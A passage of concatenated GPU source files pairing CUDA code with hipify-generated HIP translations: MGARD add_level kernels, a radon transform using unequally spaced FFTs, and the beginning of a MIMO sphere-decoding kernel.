*difib, float *dv, int lddv1, int lddv2, float *dwork, int lddwork1, int lddwork2, int queue_idx); template <typename T> __global__ void _add_level_cpt(int nr, int nc, int nf, int row_stride, int col_stride, int fib_stride, T *dv, int lddv1, int lddv2, T *dwork, int lddwork1, int lddwork2) { int z0 = blockIdx.z * blockDim.z + threadIdx.z; int y0 = blockIdx.y * blockDim.y + threadIdx.y; int x0 = blockIdx.x * blockDim.x + threadIdx.x; for (int z = z0; z * row_stride < nr; z += blockDim.z * gridDim.z) { for (int y = y0; y * col_stride < nc; y += blockDim.y * gridDim.y) { for (int x = x0; x * fib_stride < nf; x += blockDim.x * gridDim.x) { int z_strided = z * row_stride; int y_strided = y * col_stride; int x_strided = x * fib_stride; dv[get_idx(lddv1, lddv2, z_strided, y_strided, x_strided)] += dwork[get_idx(lddwork1, lddwork2, z_strided, y_strided, x_strided)]; } } } } 
template <typename T> void add_level_cpt(mgard_cuda_handle<T> &handle, int nr, int nc, int nf, int row_stride, int col_stride, int fib_stride, T *dv, int lddv1, int lddv2, T *dwork, int lddwork1, int lddwork2, int queue_idx) { int B_adjusted = min(8, handle.B); int total_thread_z = ceil((double)nr / (row_stride)); int total_thread_y = ceil((double)nc / (col_stride)); int total_thread_x = ceil((double)nf / (fib_stride)); int tbz = min(B_adjusted, total_thread_z); int tby = min(B_adjusted, total_thread_y); int tbx = min(B_adjusted, total_thread_x); int gridz = ceil((float)total_thread_z / tbz); int gridy = ceil((float)total_thread_y / tby); int gridx = ceil((float)total_thread_x / tbx); dim3 threadsPerBlock(tbx, tby, tbz); dim3 blockPerGrid(gridx, gridy, gridz); hipLaunchKernelGGL(( _add_level_cpt), dim3(blockPerGrid), dim3(threadsPerBlock), 0, *(hipStream_t *)handle.get(queue_idx), nr, nc, nf, row_stride, col_stride, fib_stride, dv, lddv1, lddv2, dwork, lddwork1, lddwork2); gpuErrchk(hipGetLastError()); #ifdef MGARD_CUDA_DEBUG gpuErrchk(hipDeviceSynchronize()); #endif } template void add_level_cpt<double>(mgard_cuda_handle<double> &handle, int nr, int nc, int nf, int row_stride, int col_stride, int fib_stride, double *dv, int lddv1, int lddv2, double *dwork, int lddwork1, int lddwork2, int queue_idx); template void add_level_cpt<float>(mgard_cuda_handle<float> &handle, int nr, int nc, int nf, int row_stride, int col_stride, int fib_stride, float *dv, int lddv1, int lddv2, float *dwork, int lddwork1, int lddwork2, int queue_idx); } // namespace mgard_cuda
4ab851abb27096ef78bfca72cbbab9c925e57b7a.cu
#include "cuda/mgard_cuda_add_level.h" #include "cuda/mgard_cuda_common_internal.h" namespace mgard_cuda { template <typename T> __global__ void _add_level(int nrow, int ncol, int nr, int nc, int row_stride, int col_stride, int *irow, int *icol, T *dv, int lddv, T *dwork, int lddwork) { int idx_x = (blockIdx.x * blockDim.x + threadIdx.x) * col_stride; int idx_y = (blockIdx.y * blockDim.y + threadIdx.y) * row_stride; for (int y = idx_y; y < nr; y += blockDim.y * gridDim.y * row_stride) { for (int x = idx_x; x < nc; x += blockDim.x * gridDim.x * col_stride) { int r = irow[y]; int c = icol[x]; dv[get_idx(lddv, r, c)] += dwork[get_idx(lddwork, r, c)]; } } } template <typename T> void add_level(mgard_cuda_handle<T> &handle, int nrow, int ncol, int nr, int nc, int row_stride, int col_stride, int *dirow, int *dicol, T *dv, int lddv, T *dwork, int lddwork, int queue_idx) { int total_thread_x = nc / col_stride; int total_thread_y = nr / row_stride; int tbx = min(handle.B, total_thread_x); int tby = min(handle.B, total_thread_y); int gridx = ceil((float)total_thread_x / tbx); int gridy = ceil((float)total_thread_y / tby); dim3 threadsPerBlock(tbx, tby); dim3 blockPerGrid(gridx, gridy); _add_level<<<blockPerGrid, threadsPerBlock, 0, *(cudaStream_t *)handle.get(queue_idx)>>>( nrow, ncol, nr, nc, row_stride, col_stride, dirow, dicol, dv, lddv, dwork, lddwork); gpuErrchk(cudaGetLastError()); #ifdef MGARD_CUDA_DEBUG gpuErrchk(cudaDeviceSynchronize()); #endif } template void add_level<double>(mgard_cuda_handle<double> &handle, int nrow, int ncol, int nr, int nc, int row_stride, int col_stride, int *dirow, int *dicol, double *dv, int lddv, double *dwork, int lddwork, int queue_idx); template void add_level<float>(mgard_cuda_handle<float> &handle, int nrow, int ncol, int nr, int nc, int row_stride, int col_stride, int *dirow, int *dicol, float *dv, int lddv, float *dwork, int lddwork, int queue_idx); template <typename T> __global__ void _add_level_cpt(int nr, int nc, int row_stride, int col_stride, T *dv, int lddv, T *dwork, int lddwork) { int idx_x = (blockIdx.x * blockDim.x + threadIdx.x) * col_stride; int idx_y = (blockIdx.y * blockDim.y + threadIdx.y) * row_stride; for (int y = idx_y; y < nr; y += blockDim.y * gridDim.y * row_stride) { for (int x = idx_x; x < nc; x += blockDim.x * gridDim.x * col_stride) { dv[get_idx(lddv, y, x)] += dwork[get_idx(lddwork, y, x)]; } } } template <typename T> void add_level_cpt(mgard_cuda_handle<T> &handle, int nr, int nc, int row_stride, int col_stride, T *dv, int lddv, T *dwork, int lddwork, int queue_idx) { int total_thread_x = nc / col_stride; int total_thread_y = nr / row_stride; int tbx = min(handle.B, total_thread_x); int tby = min(handle.B, total_thread_y); int gridx = ceil((float)total_thread_x / tbx); int gridy = ceil((float)total_thread_y / tby); dim3 threadsPerBlock(tbx, tby); dim3 blockPerGrid(gridx, gridy); _add_level_cpt<<<blockPerGrid, threadsPerBlock, 0, *(cudaStream_t *)handle.get(queue_idx)>>>( nr, nc, row_stride, col_stride, dv, lddv, dwork, lddwork); gpuErrchk(cudaGetLastError()); #ifdef MGARD_CUDA_DEBUG gpuErrchk(cudaDeviceSynchronize()); #endif } template void add_level_cpt<double>(mgard_cuda_handle<double> &handle, int nr, int nc, int row_stride, int col_stride, double *dv, int lddv, double *dwork, int lddwork, int queue_idx); template void add_level_cpt<float>(mgard_cuda_handle<float> &handle, int nr, int nc, int row_stride, int col_stride, float *dv, int lddv, float *dwork, int lddwork, int queue_idx); template <typename T> __global__ void 
_add_level(int nrow, int ncol, int nfib, int nr, int nc, int nf, int row_stride, int col_stride, int fib_stride, int *irow, int *icol, int *ifib, T *dv, int lddv1, int lddv2, T *dwork, int lddwork1, int lddwork2) { int z0 = blockIdx.z * blockDim.z + threadIdx.z * row_stride; int y0 = blockIdx.y * blockDim.y + threadIdx.y * col_stride; int x0 = blockIdx.x * blockDim.x + threadIdx.x * fib_stride; for (int z = z0; z * row_stride < nr; z += blockDim.z * gridDim.z * row_stride) { for (int y = y0; y * col_stride < nc; y += blockDim.y * gridDim.y * col_stride) { for (int x = x0; x * fib_stride < nf; x += blockDim.x * gridDim.x * fib_stride) { int z_strided = irow[z]; int y_strided = icol[y]; int x_strided = ifib[x]; dv[get_idx(lddv1, lddv2, z_strided, y_strided, x_strided)] += dwork[get_idx(lddwork1, lddwork2, z_strided, y_strided, x_strided)]; } } } } template <typename T> void add_level(mgard_cuda_handle<T> &handle, int nrow, int ncol, int nfib, int nr, int nc, int nf, int row_stride, int col_stride, int fib_stride, int *dirow, int *dicol, int *difib, T *dv, int lddv1, int lddv2, T *dwork, int lddwork1, int lddwork2, int queue_idx) { int B_adjusted = min(8, handle.B); int total_thread_z = ceil((double)nr / (row_stride)); int total_thread_y = ceil((double)nc / (col_stride)); int total_thread_x = ceil((double)nf / (fib_stride)); int tbz = min(B_adjusted, total_thread_z); int tby = min(B_adjusted, total_thread_y); int tbx = min(B_adjusted, total_thread_x); int gridz = ceil((float)total_thread_z / tbz); int gridy = ceil((float)total_thread_y / tby); int gridx = ceil((float)total_thread_x / tbx); dim3 threadsPerBlock(tbx, tby, tbz); dim3 blockPerGrid(gridx, gridy, gridz); _add_level<<<blockPerGrid, threadsPerBlock, 0, *(cudaStream_t *)handle.get(queue_idx)>>>( nrow, ncol, nfib, nr, nc, nf, row_stride, col_stride, fib_stride, dirow, dicol, difib, dv, lddv1, lddv2, dwork, lddwork1, lddwork2); gpuErrchk(cudaGetLastError()); #ifdef MGARD_CUDA_DEBUG gpuErrchk(cudaDeviceSynchronize()); #endif } template void add_level<double>(mgard_cuda_handle<double> &handle, int nrow, int ncol, int nfib, int nr, int nc, int nf, int row_stride, int col_stride, int fib_stride, int *dirow, int *dicol, int *difib, double *dv, int lddv1, int lddv2, double *dwork, int lddwork1, int lddwork2, int queue_idx); template void add_level<float>(mgard_cuda_handle<float> &handle, int nrow, int ncol, int nfib, int nr, int nc, int nf, int row_stride, int col_stride, int fib_stride, int *dirow, int *dicol, int *difib, float *dv, int lddv1, int lddv2, float *dwork, int lddwork1, int lddwork2, int queue_idx); template <typename T> __global__ void _add_level_cpt(int nr, int nc, int nf, int row_stride, int col_stride, int fib_stride, T *dv, int lddv1, int lddv2, T *dwork, int lddwork1, int lddwork2) { int z0 = blockIdx.z * blockDim.z + threadIdx.z; int y0 = blockIdx.y * blockDim.y + threadIdx.y; int x0 = blockIdx.x * blockDim.x + threadIdx.x; for (int z = z0; z * row_stride < nr; z += blockDim.z * gridDim.z) { for (int y = y0; y * col_stride < nc; y += blockDim.y * gridDim.y) { for (int x = x0; x * fib_stride < nf; x += blockDim.x * gridDim.x) { int z_strided = z * row_stride; int y_strided = y * col_stride; int x_strided = x * fib_stride; dv[get_idx(lddv1, lddv2, z_strided, y_strided, x_strided)] += dwork[get_idx(lddwork1, lddwork2, z_strided, y_strided, x_strided)]; } } } } template <typename T> void add_level_cpt(mgard_cuda_handle<T> &handle, int nr, int nc, int nf, int row_stride, int col_stride, int fib_stride, T *dv, int lddv1, int 
lddv2, T *dwork, int lddwork1, int lddwork2, int queue_idx) { int B_adjusted = min(8, handle.B); int total_thread_z = ceil((double)nr / (row_stride)); int total_thread_y = ceil((double)nc / (col_stride)); int total_thread_x = ceil((double)nf / (fib_stride)); int tbz = min(B_adjusted, total_thread_z); int tby = min(B_adjusted, total_thread_y); int tbx = min(B_adjusted, total_thread_x); int gridz = ceil((float)total_thread_z / tbz); int gridy = ceil((float)total_thread_y / tby); int gridx = ceil((float)total_thread_x / tbx); dim3 threadsPerBlock(tbx, tby, tbz); dim3 blockPerGrid(gridx, gridy, gridz); _add_level_cpt<<<blockPerGrid, threadsPerBlock, 0, *(cudaStream_t *)handle.get(queue_idx)>>>( nr, nc, nf, row_stride, col_stride, fib_stride, dv, lddv1, lddv2, dwork, lddwork1, lddwork2); gpuErrchk(cudaGetLastError()); #ifdef MGARD_CUDA_DEBUG gpuErrchk(cudaDeviceSynchronize()); #endif } template void add_level_cpt<double>(mgard_cuda_handle<double> &handle, int nr, int nc, int nf, int row_stride, int col_stride, int fib_stride, double *dv, int lddv1, int lddv2, double *dwork, int lddwork1, int lddwork2, int queue_idx); template void add_level_cpt<float>(mgard_cuda_handle<float> &handle, int nr, int nc, int nf, int row_stride, int col_stride, int fib_stride, float *dv, int lddv1, int lddv2, float *dwork, int lddwork1, int lddwork2, int queue_idx); } // namespace mgard_cuda
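The add_level pair above mostly exercises one translation rule: a CUDA triple-chevron launch on an explicit stream becomes a hipLaunchKernelGGL call with grid, block, shared-memory bytes, and stream passed as leading arguments. Below is a minimal, self-contained sketch of that mapping, using a hypothetical scale kernel that is not part of MGARD.

#include <cuda_runtime.h>

// Hypothetical kernel, used only to illustrate the launch-syntax mapping seen in the pair above.
__global__ void scale(float *v, float a, int n) {
  int i = blockIdx.x * blockDim.x + threadIdx.x;
  if (i < n) v[i] *= a;
}

void launch_scale(float *d_v, float a, int n, cudaStream_t stream) {
  dim3 block(256);
  dim3 grid((n + block.x - 1) / block.x);
  // CUDA spelling (as in the .cu file above):
  scale<<<grid, block, 0, stream>>>(d_v, a, n);
  // After hipify (as in the .hip file above), with the stream declared as hipStream_t, the same launch reads:
  //   hipLaunchKernelGGL((scale), grid, block, 0, stream, d_v, a, n);
}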
45ddbcdf303fa2023fe4653d5bbfbbe3dc710cce.hip
// !!! This is a file automatically generated by hipify!!! #include "hip/hip_runtime.h" #include "radonusfft.cuh" #include "kernels_hip.cuh" #include <stdio.h> radonusfft::radonusfft(size_t ntheta, size_t pnz, size_t n, float center, size_t theta_) : ntheta(ntheta), pnz(pnz), n(n), center(center) { float eps = 1e-3; mu = -log(eps) / (2 * n * n); m = ceil(2 * n * 1 / PI * sqrt(-mu * log(eps) + (mu * n) * (mu * n) / 4)); hipMalloc((void **)&f, n * n * pnz * sizeof(float2)); hipMalloc((void **)&g, n * ntheta * pnz * sizeof(float2)); hipMalloc((void **)&fde, 2 * n * 2 * n * pnz * sizeof(float2)); hipMalloc((void **)&fdee, (2 * n + 2 * m) * (2 * n + 2 * m) * pnz * sizeof(float2)); hipMalloc((void **)&x, n * ntheta * sizeof(float)); hipMalloc((void **)&y, n * ntheta * sizeof(float)); hipMalloc((void **)&theta, ntheta * sizeof(float)); hipMemcpy(theta, (float *)theta_, ntheta * sizeof(float), hipMemcpyDefault); int ffts[2]; int idist; int odist; int inembed[2]; int onembed[2]; //fft 2d ffts[0] = 2 * n; ffts[1] = 2 * n; idist = 2 * n * 2 * n; odist = (2 * n + 2 * m) * (2 * n + 2 * m); inembed[0] = 2 * n; inembed[1] = 2 * n; onembed[0] = 2 * n + 2 * m; onembed[1] = 2 * n + 2 * m; hipfftPlanMany(&plan2dfwd, 2, ffts, inembed, 1, idist, onembed, 1, odist, HIPFFT_C2C, pnz); hipfftPlanMany(&plan2dadj, 2, ffts, onembed, 1, odist, inembed, 1, idist, HIPFFT_C2C, pnz); //fft 1d ffts[0] = n; idist = n; odist = n; inembed[0] = n; onembed[0] = n; hipfftPlanMany(&plan1d, 1, ffts, inembed, 1, idist, onembed, 1, odist, HIPFFT_C2C, ntheta * pnz); hipMalloc((void **)&shiftfwd, n * sizeof(float2)); hipMalloc((void **)&shiftadj, n * sizeof(float2)); // compute shifts with respect to the rotation center hipLaunchKernelGGL(( takeshift), dim3(ceil(n / 1024.0)), dim3(1024), 0, 0, shiftfwd, -(center - n / 2.0), n); hipLaunchKernelGGL(( takeshift), dim3(ceil(n / 1024.0)), dim3(1024), 0, 0, shiftadj, (center - n / 2.0), n); } // destructor, memory deallocation radonusfft::~radonusfft() { free(); } void radonusfft::free() { if (!is_free) { hipFree(f); hipFree(g); hipFree(fde); hipFree(fdee); hipFree(x); hipFree(y); hipFree(shiftfwd); hipFree(shiftadj); hipfftDestroy(plan2dfwd); hipfftDestroy(plan2dadj); hipfftDestroy(plan1d); is_free = true; } } void radonusfft::fwd(size_t g_, size_t f_) { dim3 BS2d(32, 32); dim3 BS3d(32, 32, 1); dim3 GS2d0(ceil(n / (float)BS2d.x), ceil(ntheta / (float)BS2d.y)); dim3 GS3d0(ceil(n / (float)BS3d.x), ceil(n / (float)BS3d.y), ceil(pnz / (float)BS3d.z)); dim3 GS3d1(ceil(2 * n / (float)BS3d.x), ceil(2 * n / (float)BS3d.y), ceil(pnz / (float)BS3d.z)); dim3 GS3d2(ceil((2 * n + 2 * m) / (float)BS3d.x), ceil((2 * n + 2 * m) / (float)BS3d.y), ceil(pnz / (float)BS3d.z)); dim3 GS3d3(ceil(n / (float)BS3d.x), ceil(ntheta / (float)BS3d.y), ceil(pnz / (float)BS3d.z)); hipMemcpy(f, (float2 *)f_, n * n * pnz * sizeof(float2), hipMemcpyDefault); hipMemset(fde, 0, 2 * n * 2 * n * pnz * sizeof(float2)); hipMemset(fdee, 0, (2 * n + 2 * m) * (2 * n + 2 * m) * pnz * sizeof(float2)); hipLaunchKernelGGL(( circ), dim3(GS3d0), dim3(BS3d), 0, 0, f, 1.0f / n, n, pnz); hipLaunchKernelGGL(( takexy), dim3(GS2d0), dim3(BS2d), 0, 0, x, y, theta, n, ntheta); hipLaunchKernelGGL(( divphi), dim3(GS3d0), dim3(BS3d), 0, 0, fde, f, mu, n, pnz); hipLaunchKernelGGL(( fftshiftc), dim3(GS3d1), dim3(BS3d), 0, 0, fde, 2 * n, pnz); hipfftExecC2C(plan2dfwd, (hipfftComplex *)fde, (hipfftComplex *)&fdee[m + m * (2 * n + 2 * m)], HIPFFT_FORWARD); hipLaunchKernelGGL(( fftshiftc), dim3(GS3d2), dim3(BS3d), 0, 0, fdee, 2 * n + 2 * m, pnz); 
hipLaunchKernelGGL(( wrap), dim3(GS3d2), dim3(BS3d), 0, 0, fdee, n, pnz, m); hipLaunchKernelGGL(( gather), dim3(GS3d3), dim3(BS3d), 0, 0, g, fdee, x, y, m, mu, n, ntheta, pnz); // shift with respect to given center hipLaunchKernelGGL(( shift), dim3(GS3d3), dim3(BS3d), 0, 0, g, shiftfwd, n, ntheta, pnz); hipLaunchKernelGGL(( fftshift1c), dim3(GS3d3), dim3(BS3d), 0, 0, g, n, ntheta, pnz); hipfftExecC2C(plan1d, (hipfftComplex *)g, (hipfftComplex *)g, HIPFFT_BACKWARD); hipLaunchKernelGGL(( fftshift1c), dim3(GS3d3), dim3(BS3d), 0, 0, g, n, ntheta, pnz); hipMemcpy((float2 *)g_, g, n * ntheta * pnz * sizeof(float2), hipMemcpyDefault); } void radonusfft::adj(size_t f_, size_t g_) { dim3 BS2d(32, 32); dim3 BS3d(32, 32, 1); dim3 GS2d0(ceil(n / (float)BS2d.x), ceil(ntheta / (float)BS2d.y)); dim3 GS3d0(ceil(n / (float)BS3d.x), ceil(n / (float)BS3d.y), ceil(pnz / (float)BS3d.z)); dim3 GS3d1(ceil(2 * n / (float)BS3d.x), ceil(2 * n / (float)BS3d.y), ceil(pnz / (float)BS3d.z)); dim3 GS3d2(ceil((2 * n + 2 * m) / (float)BS3d.x), ceil((2 * n + 2 * m) / (float)BS3d.y), ceil(pnz / (float)BS3d.z)); dim3 GS3d3(ceil(n / (float)BS3d.x), ceil(ntheta / (float)BS3d.y), ceil(pnz / (float)BS3d.z)); hipMemcpy(g, (float2 *)g_, n * ntheta * pnz * sizeof(float2), hipMemcpyDefault); hipMemset(fde, 0, (2 * n + 2 * m) * (2 * n + 2 * m) * pnz * sizeof(float2)); hipMemset(fdee, 0, (2 * n + 2 * m) * (2 * n + 2 * m) * pnz * sizeof(float2)); hipLaunchKernelGGL(( takexy), dim3(GS2d0), dim3(BS2d), 0, 0, x, y, theta, n, ntheta); hipLaunchKernelGGL(( fftshift1c), dim3(GS3d3), dim3(BS3d), 0, 0, g, n, ntheta, pnz); hipfftExecC2C(plan1d, (hipfftComplex *)g, (hipfftComplex *)g, HIPFFT_FORWARD); hipLaunchKernelGGL(( fftshift1c), dim3(GS3d3), dim3(BS3d), 0, 0, g, n, ntheta, pnz); //applyfilter<<<GS3d3, BS3d>>>(g,n,ntheta,pnz); // shift with respect to given center hipLaunchKernelGGL(( shift), dim3(GS3d3), dim3(BS3d), 0, 0, g, shiftadj, n, ntheta, pnz); hipLaunchKernelGGL(( scatter), dim3(GS3d3), dim3(BS3d), 0, 0, fdee, g, x, y, m, mu, n, ntheta, pnz); hipLaunchKernelGGL(( wrapadj), dim3(GS3d2), dim3(BS3d), 0, 0, fdee, n, pnz, m); hipLaunchKernelGGL(( fftshiftc), dim3(GS3d2), dim3(BS3d), 0, 0, fdee, 2 * n + 2 * m, pnz); hipfftExecC2C(plan2dadj, (hipfftComplex *)&fdee[m + m * (2 * n + 2 * m)], (hipfftComplex *)fde, HIPFFT_BACKWARD); hipLaunchKernelGGL(( fftshiftc), dim3(GS3d1), dim3(BS3d), 0, 0, fde, 2 * n, pnz); hipLaunchKernelGGL(( unpaddivphi), dim3(GS3d0), dim3(BS3d), 0, 0, f, fde, mu, n, pnz); hipLaunchKernelGGL(( circ), dim3(GS3d0), dim3(BS3d), 0, 0, f, 1.0f / n, n, pnz); hipMemcpy((float2 *)f_, f, n * n * pnz * sizeof(float2), hipMemcpyDefault); }
45ddbcdf303fa2023fe4653d5bbfbbe3dc710cce.cu
#include "radonusfft.cuh" #include "kernels.cuh" #include <stdio.h> radonusfft::radonusfft(size_t ntheta, size_t pnz, size_t n, float center, size_t theta_) : ntheta(ntheta), pnz(pnz), n(n), center(center) { float eps = 1e-3; mu = -log(eps) / (2 * n * n); m = ceil(2 * n * 1 / PI * sqrt(-mu * log(eps) + (mu * n) * (mu * n) / 4)); cudaMalloc((void **)&f, n * n * pnz * sizeof(float2)); cudaMalloc((void **)&g, n * ntheta * pnz * sizeof(float2)); cudaMalloc((void **)&fde, 2 * n * 2 * n * pnz * sizeof(float2)); cudaMalloc((void **)&fdee, (2 * n + 2 * m) * (2 * n + 2 * m) * pnz * sizeof(float2)); cudaMalloc((void **)&x, n * ntheta * sizeof(float)); cudaMalloc((void **)&y, n * ntheta * sizeof(float)); cudaMalloc((void **)&theta, ntheta * sizeof(float)); cudaMemcpy(theta, (float *)theta_, ntheta * sizeof(float), cudaMemcpyDefault); int ffts[2]; int idist; int odist; int inembed[2]; int onembed[2]; //fft 2d ffts[0] = 2 * n; ffts[1] = 2 * n; idist = 2 * n * 2 * n; odist = (2 * n + 2 * m) * (2 * n + 2 * m); inembed[0] = 2 * n; inembed[1] = 2 * n; onembed[0] = 2 * n + 2 * m; onembed[1] = 2 * n + 2 * m; cufftPlanMany(&plan2dfwd, 2, ffts, inembed, 1, idist, onembed, 1, odist, CUFFT_C2C, pnz); cufftPlanMany(&plan2dadj, 2, ffts, onembed, 1, odist, inembed, 1, idist, CUFFT_C2C, pnz); //fft 1d ffts[0] = n; idist = n; odist = n; inembed[0] = n; onembed[0] = n; cufftPlanMany(&plan1d, 1, ffts, inembed, 1, idist, onembed, 1, odist, CUFFT_C2C, ntheta * pnz); cudaMalloc((void **)&shiftfwd, n * sizeof(float2)); cudaMalloc((void **)&shiftadj, n * sizeof(float2)); // compute shifts with respect to the rotation center takeshift<<<ceil(n / 1024.0), 1024>>>(shiftfwd, -(center - n / 2.0), n); takeshift<<<ceil(n / 1024.0), 1024>>>(shiftadj, (center - n / 2.0), n); } // destructor, memory deallocation radonusfft::~radonusfft() { free(); } void radonusfft::free() { if (!is_free) { cudaFree(f); cudaFree(g); cudaFree(fde); cudaFree(fdee); cudaFree(x); cudaFree(y); cudaFree(shiftfwd); cudaFree(shiftadj); cufftDestroy(plan2dfwd); cufftDestroy(plan2dadj); cufftDestroy(plan1d); is_free = true; } } void radonusfft::fwd(size_t g_, size_t f_) { dim3 BS2d(32, 32); dim3 BS3d(32, 32, 1); dim3 GS2d0(ceil(n / (float)BS2d.x), ceil(ntheta / (float)BS2d.y)); dim3 GS3d0(ceil(n / (float)BS3d.x), ceil(n / (float)BS3d.y), ceil(pnz / (float)BS3d.z)); dim3 GS3d1(ceil(2 * n / (float)BS3d.x), ceil(2 * n / (float)BS3d.y), ceil(pnz / (float)BS3d.z)); dim3 GS3d2(ceil((2 * n + 2 * m) / (float)BS3d.x), ceil((2 * n + 2 * m) / (float)BS3d.y), ceil(pnz / (float)BS3d.z)); dim3 GS3d3(ceil(n / (float)BS3d.x), ceil(ntheta / (float)BS3d.y), ceil(pnz / (float)BS3d.z)); cudaMemcpy(f, (float2 *)f_, n * n * pnz * sizeof(float2), cudaMemcpyDefault); cudaMemset(fde, 0, 2 * n * 2 * n * pnz * sizeof(float2)); cudaMemset(fdee, 0, (2 * n + 2 * m) * (2 * n + 2 * m) * pnz * sizeof(float2)); circ<<<GS3d0, BS3d>>>(f, 1.0f / n, n, pnz); takexy<<<GS2d0, BS2d>>>(x, y, theta, n, ntheta); divphi<<<GS3d0, BS3d>>>(fde, f, mu, n, pnz); fftshiftc<<<GS3d1, BS3d>>>(fde, 2 * n, pnz); cufftExecC2C(plan2dfwd, (cufftComplex *)fde, (cufftComplex *)&fdee[m + m * (2 * n + 2 * m)], CUFFT_FORWARD); fftshiftc<<<GS3d2, BS3d>>>(fdee, 2 * n + 2 * m, pnz); wrap<<<GS3d2, BS3d>>>(fdee, n, pnz, m); gather<<<GS3d3, BS3d>>>(g, fdee, x, y, m, mu, n, ntheta, pnz); // shift with respect to given center shift<<<GS3d3, BS3d>>>(g, shiftfwd, n, ntheta, pnz); fftshift1c<<<GS3d3, BS3d>>>(g, n, ntheta, pnz); cufftExecC2C(plan1d, (cufftComplex *)g, (cufftComplex *)g, CUFFT_INVERSE); fftshift1c<<<GS3d3, BS3d>>>(g, 
n, ntheta, pnz); cudaMemcpy((float2 *)g_, g, n * ntheta * pnz * sizeof(float2), cudaMemcpyDefault); } void radonusfft::adj(size_t f_, size_t g_) { dim3 BS2d(32, 32); dim3 BS3d(32, 32, 1); dim3 GS2d0(ceil(n / (float)BS2d.x), ceil(ntheta / (float)BS2d.y)); dim3 GS3d0(ceil(n / (float)BS3d.x), ceil(n / (float)BS3d.y), ceil(pnz / (float)BS3d.z)); dim3 GS3d1(ceil(2 * n / (float)BS3d.x), ceil(2 * n / (float)BS3d.y), ceil(pnz / (float)BS3d.z)); dim3 GS3d2(ceil((2 * n + 2 * m) / (float)BS3d.x), ceil((2 * n + 2 * m) / (float)BS3d.y), ceil(pnz / (float)BS3d.z)); dim3 GS3d3(ceil(n / (float)BS3d.x), ceil(ntheta / (float)BS3d.y), ceil(pnz / (float)BS3d.z)); cudaMemcpy(g, (float2 *)g_, n * ntheta * pnz * sizeof(float2), cudaMemcpyDefault); cudaMemset(fde, 0, (2 * n + 2 * m) * (2 * n + 2 * m) * pnz * sizeof(float2)); cudaMemset(fdee, 0, (2 * n + 2 * m) * (2 * n + 2 * m) * pnz * sizeof(float2)); takexy<<<GS2d0, BS2d>>>(x, y, theta, n, ntheta); fftshift1c<<<GS3d3, BS3d>>>(g, n, ntheta, pnz); cufftExecC2C(plan1d, (cufftComplex *)g, (cufftComplex *)g, CUFFT_FORWARD); fftshift1c<<<GS3d3, BS3d>>>(g, n, ntheta, pnz); //applyfilter<<<GS3d3, BS3d>>>(g,n,ntheta,pnz); // shift with respect to given center shift<<<GS3d3, BS3d>>>(g, shiftadj, n, ntheta, pnz); scatter<<<GS3d3, BS3d>>>(fdee, g, x, y, m, mu, n, ntheta, pnz); wrapadj<<<GS3d2, BS3d>>>(fdee, n, pnz, m); fftshiftc<<<GS3d2, BS3d>>>(fdee, 2 * n + 2 * m, pnz); cufftExecC2C(plan2dadj, (cufftComplex *)&fdee[m + m * (2 * n + 2 * m)], (cufftComplex *)fde, CUFFT_INVERSE); fftshiftc<<<GS3d1, BS3d>>>(fde, 2 * n, pnz); unpaddivphi<<<GS3d0, BS3d>>>(f, fde, mu, n, pnz); circ<<<GS3d0, BS3d>>>(f, 1.0f / n, n, pnz); cudaMemcpy((float2 *)f_, f, n * n * pnz * sizeof(float2), cudaMemcpyDefault); }
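Beyond the launch syntax, the radonusfft pair above shows the FFT-library renames: cufftPlanMany/cufftExecC2C and the CUFFT_* constants become hipfftPlanMany/hipfftExecC2C and HIPFFT_*, with CUFFT_INVERSE mapping to HIPFFT_BACKWARD. The sketch below is a minimal batched 1-D round trip in the CUDA spelling with the hipFFT names noted in comments; it is illustrative only, and the hipFFT header path varies by ROCm release.

#include <cufft.h>           // hipFFT counterpart: #include <hipfft.h> (path may vary by ROCm version)
#include <cuda_runtime.h>

// Runs a batched in-place 1-D complex-to-complex FFT, forward then inverse.
// Note that cuFFT/hipFFT do not normalize, so the round trip scales the data by n.
void fft_roundtrip(cufftComplex *d_data, int n, int batch) {
  cufftHandle plan;                                    // hipfftHandle
  cufftPlan1d(&plan, n, CUFFT_C2C, batch);             // hipfftPlan1d(&plan, n, HIPFFT_C2C, batch)
  cufftExecC2C(plan, d_data, d_data, CUFFT_FORWARD);   // hipfftExecC2C(..., HIPFFT_FORWARD)
  cufftExecC2C(plan, d_data, d_data, CUFFT_INVERSE);   // hipfftExecC2C(..., HIPFFT_BACKWARD)
  cudaDeviceSynchronize();                             // hipDeviceSynchronize()
  cufftDestroy(plan);                                  // hipfftDestroy(plan)
}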
3e8132cbe7e75844f0c390f68c2bb39b08983e2b.hip
// !!! This is a file automatically generated by hipify!!! #include "hip/hip_runtime.h" /* * * Copyright 1993-2012 NVIDIA Corporation. All rights reserved. * * Please refer to the NVIDIA end user license agreement (EULA) associated * with this source code for terms and conditions that govern your use of * this software. Any use, reproduction, disclosure, or distribution of * this software and related documentation outside the terms of the EULA * is strictly prohibited. */ /* * this function implement fixed complexity sphere decoding * INPUT: * y: received signal * H: permuted propagation matrix * M: modulation scheme, (2: BPSK 4: QPSK, 16: 16QAM, 64: 64QAM) * psymbolconstellation: the symbol constellation * OUTPUT: * s: detection result * Eu: Euclidean distance */ #include <stdio.h> #include <stdlib.h> #include<hip/hip_complex.h> #include <string.h> #include<math.h> #include<cuda_runtime.h> #include<cuda.h> #include<rocblas.h> #include<time.h> #include"cu_complex_operation.cuh" #include"common.h" #include<cuda_runtime.h> #include<cuda.h> #include<cudaProfiler.h> #include<hip/hip_runtime_api.h> #include<hip/device_functions.h> #define threadNum 1024 #define blockNum 4 #define stride 1 /* * in this version I applied colesced memory accesss to all the vector and matrix, with all the matrix stored in row major different threads reading one column * with all the matrix stored in column major, different threads reading one row * uitilize consecutive computation power */ __constant__ hipComplex d_R[MATRIX_SIZE*MATRIX_SIZE],d_psymbolconstellation[16],d_constant_shat[MATRIX_SIZE]; __constant__ int d_list[MATRIX_SIZE]; __global__ void FEpath( // hipComplex *d_R, //upper triangular matrix after cholesky factorization // hipComplex *d_constant_shat, //unconstrained estimation of transmitted symbol vector s // hipComplex *s_matrix_share, hipComplex *s_potential_matrix, //the matrix use to store all the solution candidates from all the blocks int *s_sub_index, //full factorial index matrix int rho, int pathNum, // hipComplex *s, //decoding results float *Eu, //Euclidean distance // int pitch_R, //the number of transmit antennas // int pitch_index, //the number of receive antennas // int pitch_p, int M, //modulation scheme // int threadNum, //number of threads // int *d_list, //the permutation list // hipComplex *d_psymbolconstellation, int index ) { //need to consider the resource allocation int tx=blockIdx.x*blockDim.x+threadIdx.x; //if the path number is small we can allocate the kernel into one block so that we can use the shared memory int tid=threadIdx.x; int Nt=MATRIX_SIZE; //allocate shared 